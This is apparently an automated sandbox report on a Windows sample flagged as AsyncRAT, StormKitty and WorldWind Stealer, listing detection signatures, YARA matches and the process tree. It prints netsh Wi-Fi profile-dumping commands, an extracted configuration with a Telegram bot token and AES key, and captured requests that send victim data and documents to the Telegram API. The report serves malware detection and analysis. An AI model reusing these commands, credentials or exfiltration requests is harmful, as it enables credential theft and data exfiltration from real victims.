Windows Analysis Report
file.exe

Overview

General Information

Sample Name: file.exe
Analysis ID: 893767
MD5: c03a7cedc3314e6f0dc26431503dd035
SHA1: 3a4c09c8c54639a839ce19f49e9018e53ac6b2b8
SHA256: 719169d99a13f958de7a3f58d34ac4262cc90924eea256c782ed0b82de6adc0a
Tags: NET, AsyncRAT, exe, MSIL

Detection

AsyncRAT, StormKitty, WorldWind Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Telegram Recon
Malicious sample detected (through community Yara rule)
Sigma detected: Capture Wi-Fi password
Yara detected Telegram RAT
Antivirus / Scanner detection for submitted sample
Yara detected StormKitty Stealer
Antivirus detection for URL or domain
Yara detected WorldWind Stealer
Yara detected AsyncRAT
Uses netsh to modify the Windows network and firewall settings
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Contains functionality to log keystrokes (.Net Source)
Uses the Telegram API (likely for C&C communication)
Tries to harvest and steal WLAN passwords
Machine Learning detection for sample
Modifies existing user documents (likely ransomware behavior)
May check the online IP address of the machine
.NET source code contains potential unpacker
Yara detected Generic Downloader
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Found many strings related to Crypto-Wallets (likely being stolen)
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries information about the installed CPU (vendor, model number etc)
Queries the product ID of Windows
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Binary contains a suspicious time stamp
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • file.exe (PID: 5740 cmdline: C:\Users\user\Desktop\file.exe MD5: C03A7CEDC3314E6F0DC26431503DD035)
    • cmd.exe (PID: 7128 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 7136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • chcp.com (PID: 812 cmdline: chcp 65001 MD5: 561054CF9C4B2897E80D7E7D9027FED9)
      • netsh.exe (PID: 3872 cmdline: netsh wlan show profile MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
      • findstr.exe (PID: 1424 cmdline: findstr All MD5: 8B534A7FC0630DE41BB1F98C882C19EC)
    • cmd.exe (PID: 2752 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • chcp.com (PID: 5928 cmdline: chcp 65001 MD5: 561054CF9C4B2897E80D7E7D9027FED9)
      • netsh.exe (PID: 5916 cmdline: netsh wlan show networks mode=bssid MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
  • cleanup
Name: AsyncRAT
Description: AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victim's computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

Name: Cameleon, StormKitty
Description: PWC describes this malware as a backdoor, capable of file management, upload and download of files, and execution of commands.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cameleon
{"Server": "127.0.0.1", "Ports": "6606,7707,8808", "Telegram C2": "https://api.telegram.org/bot6154715708:AAFzLcpt7CU7GhHYDqN7AZi1rev_GZv5Qe4/sendMessage?chat_id=1165040754", "Version": "", "AES_key": "4qsKtpuqPkY57c6vW77AyPmuPai9cZ4h", "Mutex": "AsyncMutex_6SI8OkPnk", "Certificate": "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", "ServerSignature": "kKsugsQu3eo73x+SF5NyNjFkKDoXYn4ibGkrv9d0mkNnkKX+Xs41dOvJxwMgSJjBJAXj+kNdHADhM/iRYmcGc/NxyqBwsaC5K/dYnwy2d0Ql9//q5zMO7YVpgN61hVy0b2dt1IWghvqeKizPfiHDIfvkrxBpdjwYWygmjx9iN8JKRpmULW8AoVx5k7uaSUgaJDjALDI95VCmGJj4aN7IcYpgKR7F735u3zuLyxhSB/T0rlwa6Q1uWmhi6PDVAJAknWxbZJ0UpgeZL8ATQ9pyhbvrRO9hCMPsZs6zqfG1+puICezW6w7hg9qYVow1+at019AO6DMG8zJqefgF9GOCvc6kpUtbexucO8kXKrznL0U3dd6WjF7dXA2dokbFCLdeyfg6GQ8MEll6kOsJhWZSpZXGhMOfsflOdm1Ksw6RtA/3/KYxFePq5WddQ3TLf3bsWi+cD7cDlFcqfKoUrYZ/ndHwQQKvpUlvYm4SEiK3/haqxHO829zmaG3rIot/vlWFX+5YwfQPnDNQz3uR+CsGPDbArZd+7EkdQoCDxBVsUF5gv0IaNvTH9yMloFidO9YNY6us2DEHJTqoHZ174gAbISlVsA3kqmU57mmKbbVbMtv4W0k5sfJjHqjcLElY2q++S80yA2JhU5EUGvYOK95r37xzEXuITa92/4UqIGNLMM4=", "Group": "Default"}
{"C2 url": "https://api.telegram.org/bot6154715708:AAFzLcpt7CU7GhHYDqN7AZi1rev_GZv5Qe4/sendMessage", "Telegram Stream": [{"ok": true, "result": {"message_id": 3918, "from": {"id": 6154715708, "is_bot": true, "first_name": "oRG", "username": "XChannX_bot"}, "chat": {"id": 1165040754, "first_name": "\u0196\u1ee9\u010d\u1ecb\u1e1f\u0454\u04f7", "last_name": "\uff7f\u012f\u028d\u1e4d\u1e5d\u1e45\u0268\u1e45\u0262\u0455\u1e6f\u1ea3\u1e5d", "username": "Lucifer7005", "type": "private"}, "date": 1687548098, "text": "\ud83d\udcc1 Uploading Log Folders..."}}]}
Source | Rule | Description | Author
file.exe | JoeSecurity_WorldWindStealer | Yara detected WorldWind Stealer | Joe Security
file.exe | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
file.exe | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security
file.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
file.exe | JoeSecurity_StormKitty | Yara detected StormKitty Stealer | Joe Security

Source | Rule | Description | Author
sslproxydump.pcap | JoeSecurity_WorldWindStealer | Yara detected WorldWind Stealer | Joe Security

Source | Rule | Description | Author
00000000.00000002.741988818.0000000003328000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_WorldWindStealer | Yara detected WorldWind Stealer | Joe Security
00000000.00000000.472435711.0000000000EE2000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_WorldWindStealer | Yara detected WorldWind Stealer | Joe Security
00000000.00000000.472435711.0000000000EE2000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
00000000.00000000.472435711.0000000000EE2000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security
00000000.00000000.472435711.0000000000EE2000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_StormKitty | Yara detected StormKitty Stealer | Joe Security

Source | Rule | Description | Author
0.0.file.exe.ee0000.0.unpack | JoeSecurity_WorldWindStealer | Yara detected WorldWind Stealer | Joe Security
0.0.file.exe.ee0000.0.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
0.0.file.exe.ee0000.0.unpack | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security
0.0.file.exe.ee0000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
0.0.file.exe.ee0000.0.unpack | JoeSecurity_StormKitty | Yara detected StormKitty Stealer | Joe Security

Stealing of Sensitive Information

Source: Process started, Author: Joe Security, Data: Command: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\Desktop\file.exe, ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 5740, ParentProcessName: file.exe, ProcessCommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, ProcessId: 7128, ProcessName: cmd.exe
No Snort rule has matched

AV Detection

                                  Source: file.exeMalware Configuration Extractor: AsyncRAT {"Server": "127.0.0.1", "Ports": "6606,7707,8808", "Telegram C2": "https://api.telegram.org/bot6154715708:AAFzLcpt7CU7GhHYDqN7AZi1rev_GZv5Qe4/sendMessage?chat_id=1165040754", "Version": "", "AES_key": "4qsKtpuqPkY57c6vW77AyPmuPai9cZ4h", "Mutex": "AsyncMutex_6SI8OkPnk", "Certificate": "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", "ServerSignature": "kKsugsQu3eo73x+SF5NyNjFkKDoXYn4ibGkrv9d0mkNnkKX+Xs41dOvJxwMgSJjBJAXj+kNdHADhM/iRYmcGc/NxyqBwsaC5K/dYnwy2d0Ql9//q5zMO7YVpgN61hVy0b2dt1IWghvqeKizPfiHDIfvkrxBpdjwYWygmjx9iN8JKRpmULW8AoVx5k7uaSUgaJDjALDI95VCmGJj4aN7IcYpgKR7F735u3zuLyxhSB/T0rlwa6Q1uWmhi6PDVAJAknWxbZJ0UpgeZL8ATQ9pyhbvrRO9hCMPsZs6zqfG1+puICezW6w7hg9qYVow1+at019AO6DMG8zJqefgF9GOCvc6kpUtbexucO8kXKrznL0U3dd6WjF7dXA2dokbFCLdeyfg6GQ8MEll6kOsJhWZSpZXGhMOfsflOdm1Ksw6RtA/3/KYxFePq5WddQ3TLf3bsWi+cD7cDlFcqfKoUrYZ/ndHwQQKvpUlvYm4SEiK3/haqxHO829zmaG3rIot/vlWFX+5YwfQPnDNQz3uR+CsGPDbArZd+7EkdQoCDxBVsUF5gv0IaNvTH9yMloFidO9YNY6us2DEHJTqoHZ174gAbISlVsA3kqmU57mmKbbVbMtv4W0k5sfJjHqjcLElY2q++S80yA2JhU5EUGvYOK95r37xzEXuITa92/4UqIGNLMM4=", "Group": "Default"}
                                  Source: file.exe.5740.0.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot6154715708:AAFzLcpt7CU7GhHYDqN7AZi1rev_GZv5Qe4/sendMessage", "Telegram Stream": [{"ok": true, "result": {"message_id": 3918, "from": {"id": 6154715708, "is_bot": true, "first_name": "oRG", "username": "XChannX_bot"}, "chat": {"id": 1165040754, "first_name": "\u0196\u1ee9\u010d\u1ecb\u1e1f\u0454\u04f7", "last_name": "\uff7f\u012f\u028d\u1e4d\u1e5d\u1e45\u0268\u1e45\u0262\u0455\u1e6f\u1ea3\u1e5d", "username": "Lucifer7005", "type": "private"}, "date": 1687548098, "text": "\ud83d\udcc1 Uploading Log Folders..."}}]}
Source: file.exe, Virustotal: Detection: 74%
Source: file.exe, Avira: detected
Source: https://raw.githubusercontent.com/LimerBoy/StormKitty/master/StormKitty/stub/packages/DotNetZip.1.13, Avira URL Cloud: Label: malware
Source: file.exe, Joe Sandbox ML: detected
Source: unknown, HTTPS traffic detected: 172.67.196.114:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: file.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Source: unknown, DNS query: name: api.telegram.org
Source: C:\Users\user\Desktop\file.exe, DNS query: name: icanhazip.com
Source: Yara match, File source: file.exe, type: SAMPLE
Source: Yara match, File source: 0.0.file.exe.ee0000.0.unpack, type: UNPACKEDPE
Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                                  Source: global trafficHTTP traffic detected: GET /geolocation/wifi?v=1.1&bssid=00:0c:29:82:cb:33 HTTP/1.1Host: api.mylnikov.orgConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: GET /bot6154715708:AAFzLcpt7CU7GhHYDqN7AZi1rev_GZv5Qe4/sendMessage?chat_id=1165040754&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Stealer%202.0.4%20-%20Results:*%0ADate:%202023-06-23%209:21:17%20PM%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20116938%0ALanguage:%20%F0%9F%87%BA%F0%9F%87%B8%20en-US%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20F8HBZTST%0ARAM:%204095MB%0AHWID:%2067C81467FB%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%2084.17.52.5%0ABSSID:%2000:0c:29:82:cb:33%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20*Logs:*%0A%0A%20%20%F0%9F%97%83%20*Software:*%0A%0A%20%20%F0%9F%A7%AD%20*Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20*File%20Grabber:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%209%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2060%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2040%0A%0A%20%20Contact%20Developer:%20@FlatLineStealer%0A%20%20%20Join%20The%20Telegram%20Channel:%20@CashOutGangTalk&parse_mode=Markdown&disable_web_page_preview=True HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: GET /bot6154715708:AAFzLcpt7CU7GhHYDqN7AZi1rev_GZv5Qe4/sendMessage?chat_id=1165040754&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: POST /bot6154715708:AAFzLcpt7CU7GhHYDqN7AZi1rev_GZv5Qe4/sendDocument?chat_id=1165040754 HTTP/1.1Content-Type: multipart/form-data; boundary="1b2c3db3-4c43-4a40-ba16-8f0a6647d75a"Host: api.telegram.orgContent-Length: 194790Expect: 100-continue
                                  Source: global trafficHTTP traffic detected: POST /bot1119746739:AAGMhvpUjXI4CzIfizRC--VXilxnkJlhaf8/sendDocument?chat_id=1096425866 HTTP/1.1Content-Type: multipart/form-data; boundary="e77a6233-58d8-4287-8763-8e3899d68419"Host: api.telegram.orgContent-Length: 194790Expect: 100-continue
                                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
Source: Joe Sandbox View, IP Address: 149.154.167.220
Source: Joe Sandbox View, IP Address: 172.67.196.114
Source: unknown, Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown, Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown, Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown, Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49718 -> 443
                                  Source: file.exe, 00000000.00000002.741988818.0000000003393000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                                  Source: file.exe, 00000000.00000003.527304493.0000000001579000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.741302323.000000000157A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                                  Source: file.exe, 00000000.00000002.745606612.0000000005DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft.c
                                  Source: file.exe, 00000000.00000002.741988818.00000000032B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://icanhazip.com
                                  Source: file.exe, 00000000.00000002.741988818.00000000032B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://icanhazip.com/
                                  Source: file.exe, 00000000.00000002.741988818.00000000032B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                  Source: tmp27E2.tmp.dat.0.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                                  Source: file.exe, 00000000.00000002.741988818.00000000032FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:0c:29:82:cb:33
                                  Source: file.exe, 00000000.00000002.741988818.00000000032FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.mylnikov.org4
                                  Source: file.exe, 00000000.00000002.741988818.0000000003909000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram
                                  Source: file.exe, 00000000.00000002.741988818.0000000003393000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.741988818.00000000038A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                                  Source: file.exeString found in binary or memory: https://api.telegram.org/bot
                                  Source: file.exeString found in binary or memory: https://api.telegram.org/bot1119746739:AAGMhvpUjXI4CzIfizRC--VXilxnkJlhaf8/send
                                  Source: file.exe, 00000000.00000002.741988818.0000000003393000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot1119746739:AAGMhvpUjXI4CzIfizRC--VXilxnkJlhaf8/sendDocument?chat_id=1096
                                  Source: file.exe, 00000000.00000002.741988818.00000000038A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot6154715708:AAFzLcpt7CU7GhHYDqN7AZi1rev_GZv5Qe4/sendDocument?chat_id=1165
                                  Source: file.exe, 00000000.00000002.741988818.0000000003909000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot6154715708:AAFzLcpt7CU7GhHYDqN7AZi1rev_GZv5Qe4/sendMessage
                                  Source: file.exe, 00000000.00000002.741988818.0000000003328000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot6154715708:AAFzLcpt7CU7GhHYDqN7AZi1rev_GZv5Qe4/sendMessage?chat_id=11650
                                  Source: file.exeString found in binary or memory: https://api.telegram.org/file/bot
                                  Source: file.exe, 00000000.00000002.741988818.0000000003328000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org4
                                  Source: tmp27E2.tmp.dat.0.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                                  Source: tmp27E2.tmp.dat.0.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                                  Source: file.exe, 00000000.00000002.744440505.0000000004329000.00000004.00000800.00020000.00000000.sdmp, tmp2882.tmp.dat.0.dr, tmp27E2.tmp.dat.0.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                                  Source: tmp27E2.tmp.dat.0.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                                  Source: file.exeString found in binary or memory: https://github.com/LimerBoy/StormKitty
                                  Source: file.exe, 00000000.00000002.741988818.00000000032B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/LimerBoy/StormKittyHn
                                  Source: file.exeString found in binary or memory: https://raw.githubusercontent.com/LimerBoy/StormKitty/master/StormKitty/stub/packages/DotNetZip.1.13
                                  Source: file.exe, 00000000.00000002.744440505.0000000004329000.00000004.00000800.00020000.00000000.sdmp, tmp2882.tmp.dat.0.dr, tmp27E2.tmp.dat.0.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                                  Source: file.exe, 00000000.00000002.744440505.0000000004329000.00000004.00000800.00020000.00000000.sdmp, tmp2882.tmp.dat.0.dr, tmp27E2.tmp.dat.0.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
                                  Source: file.exe, 00000000.00000002.744440505.0000000004329000.00000004.00000800.00020000.00000000.sdmp, tmp2882.tmp.dat.0.dr, tmp27E2.tmp.dat.0.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
                                  Source: file.exe, 00000000.00000002.744440505.0000000004329000.00000004.00000800.00020000.00000000.sdmp, tmp2882.tmp.dat.0.dr, tmp27E2.tmp.dat.0.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
                                  Source: file.exe, 00000000.00000002.744440505.0000000004329000.00000004.00000800.00020000.00000000.sdmp, tmp2882.tmp.dat.0.dr, tmp27E2.tmp.dat.0.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                                  Source: unknownHTTP traffic detected: POST /bot6154715708:AAFzLcpt7CU7GhHYDqN7AZi1rev_GZv5Qe4/sendDocument?chat_id=1165040754 HTTP/1.1Content-Type: multipart/form-data; boundary="1b2c3db3-4c43-4a40-ba16-8f0a6647d75a"Host: api.telegram.orgContent-Length: 194790Expect: 100-continue
                                  Source: unknownDNS traffic detected: queries for: 202.200.1.0.in-addr.arpa

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match, File source: file.exe, type: SAMPLE
Source: Yara match, File source: 0.0.file.exe.ee0000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000000.00000000.472435711.0000000000EE2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: file.exe PID: 5740, type: MEMORYSTR
Source: file.exe, Client/Modules/Keylogger/Keylogger.cs, .Net Code: SetHook
Source: file.exe, Client/Modules/Keylogger/Keylogger.cs, .Net Code: KeyboardLayout
Source: 0.0.file.exe.ee0000.0.unpack, Client/Modules/Keylogger/Keylogger.cs, .Net Code: SetHook
Source: 0.0.file.exe.ee0000.0.unpack, Client/Modules/Keylogger/Keylogger.cs, .Net Code: KeyboardLayout
Source: file.exe, 00000000.00000002.741020710.00000000014E0000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Users\user\Desktop\file.exe, File deleted: C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Desktop\QFAPOWPAFG\QFAPOWPAFG.docx
Source: C:\Users\user\Desktop\file.exe, File deleted: C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Desktop\BQJUWOYRTO.png
Source: C:\Users\user\Desktop\file.exe, File deleted: C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Desktop\HQJBRDYKDE\NIRMEKAMZH.xlsx
Source: C:\Users\user\Desktop\file.exe, File deleted: C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Desktop\NIRMEKAMZH.xlsx
Source: C:\Users\user\Desktop\file.exe, File deleted: C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Desktop\SNIPGPPREP\GNLQNHOLWB.jpg

System Summary

Source: file.exe, type: SAMPLE, Matched rule: Detects file containing reversed ASEP Autorun registry keys, Author: ditekSHen
Source: file.exe, type: SAMPLE, Matched rule: Detects executables referencing Discord tokens regular expressions, Author: ditekSHen
Source: file.exe, type: SAMPLE, Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers, Author: ditekSHen
Source: file.exe, type: SAMPLE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
Source: file.exe, type: SAMPLE, Matched rule: Detects StormKitty infostealer, Author: ditekSHen
Source: 0.0.file.exe.ee0000.0.unpack, type: UNPACKEDPE, Matched rule: Detects file containing reversed ASEP Autorun registry keys, Author: ditekSHen
Source: 0.0.file.exe.ee0000.0.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Discord tokens regular expressions, Author: ditekSHen
Source: 0.0.file.exe.ee0000.0.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers, Author: ditekSHen
Source: 0.0.file.exe.ee0000.0.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
Source: 0.0.file.exe.ee0000.0.unpack, type: UNPACKEDPE, Matched rule: Detects StormKitty infostealer, Author: ditekSHen
Source: 00000000.00000000.472435711.0000000000EE2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY, Matched rule: Detects file containing reversed ASEP Autorun registry keys, Author: ditekSHen
Source: 00000000.00000000.472435711.0000000000EE2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY, Matched rule: Detects executables referencing Discord tokens regular expressions, Author: ditekSHen
Source: 00000000.00000002.741988818.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects executables referencing Discord tokens regular expressions, Author: ditekSHen
Source: Process Memory Space: file.exe PID: 5740, type: MEMORYSTR, Matched rule: Detects file containing reversed ASEP Autorun registry keys, Author: ditekSHen
Source: Process Memory Space: file.exe PID: 5740, type: MEMORYSTR, Matched rule: Detects executables referencing Discord tokens regular expressions, Author: ditekSHen
Source: file.exe, type: SAMPLE, Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: file.exe, type: SAMPLE, Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: file.exe, type: SAMPLE, Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: file.exe, type: SAMPLE, Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                                  Source: file.exe, type: SAMPLEMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
                                  Source: 0.0.file.exe.ee0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                  Source: 0.0.file.exe.ee0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                                  Source: 0.0.file.exe.ee0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
                                  Source: 0.0.file.exe.ee0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                                  Source: 0.0.file.exe.ee0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
                                  Source: 00000000.00000000.472435711.0000000000EE2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                  Source: 00000000.00000000.472435711.0000000000EE2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
